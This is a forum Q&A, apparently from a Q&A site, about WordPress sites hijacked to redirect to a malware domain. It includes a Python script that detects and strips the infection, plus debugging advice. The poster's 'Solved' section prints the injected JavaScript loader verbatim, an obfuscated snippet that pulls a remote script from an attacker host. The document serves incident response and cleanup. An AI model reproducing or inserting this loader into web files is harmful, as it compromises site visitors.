Tags: wordpress, security, centos, malware, php, js

WordPress Malware - Redirect to (fast.destinyfernandi.com) - even after scan and clean


I'm living my worst nightmare. I have a CentOS server that is hosting tens of WordPress websites.

My clients noticed that their websites open and, after loading, are redirected to (fast.destinyfernandi.com) <---- malware website.

I used ClamAV to detect the malware and clean them manually, without any success.

Here is an example of the clamscan result for one of the websites:

----------- SCAN SUMMARY -----------
Known viruses: 6938202
Engine version: 0.101.5
Scanned directories: 2300
Scanned files: 91116
Infected files: 0
Data scanned: 4588.75 MB
Data read: 24121.63 MB (ratio 0.19:1)
Time: 1705.569 sec (28 m 25 s)

But this site is still redirecting to that malware website.

Has anyone come across such an issue?

Please help.

==================================Solved:=============================

The code was injected into all JS files:

// Injected loader found in the site's .js files: creates an async <script> tag pointing at a remote host.
var hglgfdrr4634hezfdg = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript'; s.async=true;
// The char codes decode to https://tom.verybeatifulantony.com/a.js, so that host (not destinyfernandi) is the first hop to search for.
var pl = String.fromCharCode(104,116,116,112,115,58,47,47,116,111,109,46,118,101,114,121,98,101,97,116,105,102,117,108,97,110,116,111,110,121,46,99,111,109,47,97,46,106,115); s.src=pl;
// Insert the remote script next to the currently executing script tag, or fall back to <head>.
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}

Solution

  • There are several ways your web resource could be redirected to destinyfernandi.

    1. The database could be patched so that your own legitimate code does the redirect.
    2. Some injected code in PHP, JS or HTML templates does the redirect, either via window.location, a meta refresh, or the response headers.

    First discover what address you get redirected to, whether it is destinyfernandi or some other URL. I mean, you could be redirected to some "invisible" URL1, and the server servicing URL1 would redirect the browser further to destinyfernandi.

    Once you discover the first hop (URL) in the redirects, you can search for the bad URL in the source code and the database dump.

    There is also a chance that the first-hop URL (most likely destinyfernandi) is obfuscated in your code, but let's hope that is not the case.

    You can also add a breakpoint that fires on redirects, which could help you identify the obfuscated piece of JS code:

    // Pauses in DevTools right before the page navigates away, so the call stack shows who triggered the redirect.
    window.addEventListener("beforeunload", function() { debugger; }, false)
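
The answer's procedure (find the first hop, search the source tree for it, expect it to be obfuscated) and the loader posted in the "Solved" section above can be put together in one script. The following is an added example, not code from the original question or answer: it walks a web root, matches the injected loader, decodes its String.fromCharCode() payload to reveal the first-hop URL, and optionally strips the loader while keeping the infected original as a backup. The regex is tuned to the exact loader posted above; other variants of this injection would need their own pattern (assumption), and the sample file contents are constructed for the demo.

```python
"""Added example (not from the original post): locate the injected loader
shown above in a web root, decode its String.fromCharCode() payload to
reveal the first-hop URL, and strip it from infected .js files.

Assumption: LOADER_RE is tuned to the exact loader posted in the question;
other variants of the injection may need their own pattern."""
import os
import re
import tempfile

# The loader exactly as posted, used here as constructed sample input.
SAMPLE_LOADER = (
    "var hglgfdrr4634hezfdg = 1; var d=document;var s=d.createElement('script'); "
    "s.type='text/javascript'; s.async=true;\n"
    "var pl = String.fromCharCode(104,116,116,112,115,58,47,47,116,111,109,46,118,"
    "101,114,121,98,101,97,116,105,102,117,108,97,110,116,111,110,121,46,99,111,"
    "109,47,97,46,106,115); s.src=pl;\n"
    "if (document.currentScript) {\n"
    "document.currentScript.parentNode.insertBefore(s, document.currentScript);\n"
    "} else {\n"
    "d.getElementsByTagName('head')[0].appendChild(s);\n"
    "}\n"
)
LEGIT_JS = "(function () { console.log('site script'); })();\n"  # constructed

# Structure of the posted loader: a random marker variable set to 1, the
# createElement('script') block, then the insertBefore/appendChild branches
# that close the snippet. Non-greedy so one match never spans two loaders.
LOADER_RE = re.compile(
    r"var\s+\w+\s*=\s*1;\s*var\s+d\s*=\s*document;\s*var\s+s\s*=\s*d\.createElement\('script'\);"
    r".*?d\.getElementsByTagName\('head'\)\[0\]\.appendChild\(s\);\s*\}\s*",
    re.DOTALL,
)
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(([\d\s,]+)\)")


def decode_fromcharcode(js):
    """Decode every String.fromCharCode(n, n, ...) literal found in js."""
    decoded = []
    for m in FROMCHARCODE_RE.finditer(js):
        codes = [int(c) for c in m.group(1).split(",") if c.strip()]
        decoded.append("".join(chr(c) for c in codes))
    return decoded


def find_loader(js):
    """Return (start, end, first_hop_url) for the first loader in js, else None."""
    m = LOADER_RE.search(js)
    if m is None:
        return None
    urls = decode_fromcharcode(m.group(0))
    return m.start(), m.end(), (urls[0] if urls else None)


def strip_loader(js):
    """Return (cleaned_js, removed_count) with every loader instance removed."""
    return LOADER_RE.subn("", js)


def scan_tree(root, extensions=(".js",), clean=False):
    """Map each infected file under root to its decoded first-hop URL.

    With clean=True the loader is stripped and the original is kept as
    <file>.infected.bak so the evidence survives for later analysis."""
    hits = {}
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            if not name.endswith(extensions):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                js = fh.read()
            found = find_loader(js)
            if found is None:
                continue
            hits[path] = found[2]
            if clean:
                cleaned, _n = strip_loader(js)
                os.replace(path, path + ".infected.bak")
                with open(path, "w", encoding="utf-8") as fh:
                    fh.write(cleaned)
    return hits


def demo():
    """Build a throwaway web root with one infected and one clean file,
    scan it, clean it, and report what happened (used for self-checking)."""
    with tempfile.TemporaryDirectory() as root:
        infected = os.path.join(root, "wp-includes", "js", "jquery.js")
        os.makedirs(os.path.dirname(infected))
        with open(infected, "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_LOADER + LEGIT_JS)
        with open(os.path.join(root, "clean.js"), "w", encoding="utf-8") as fh:
            fh.write(LEGIT_JS)
        before = scan_tree(root, clean=True)
        with open(infected, encoding="utf-8") as fh:
            after_text = fh.read()
        return {
            "infected_count": len(before),
            "first_hop": next(iter(before.values())),
            "restored": after_text == LEGIT_JS,
            "backup_exists": os.path.exists(infected + ".infected.bak"),
            "rescan_clean": scan_tree(root) == {},
        }


if __name__ == "__main__":
    print(demo())
```

Run it first without clean=True to get the list of infected files and the decoded first-hop host, then grep the whole web root (PHP and theme files included, not only .js) for that host and for the marker variable before cleaning. The database half of the answer still has to be checked separately, for example with wp-cli: `wp db query "SELECT option_name, option_value FROM wp_options WHERE option_name IN ('siteurl','home')"` and a search of wp_posts and wp_options for the decoded host. A signature-based strip only removes the variant it knows about; since something wrote into every .js file, the writer (typically an injected PHP file or a compromised admin/FTP credential) is still there until core, plugins and themes are reinstalled from clean copies and credentials are rotated.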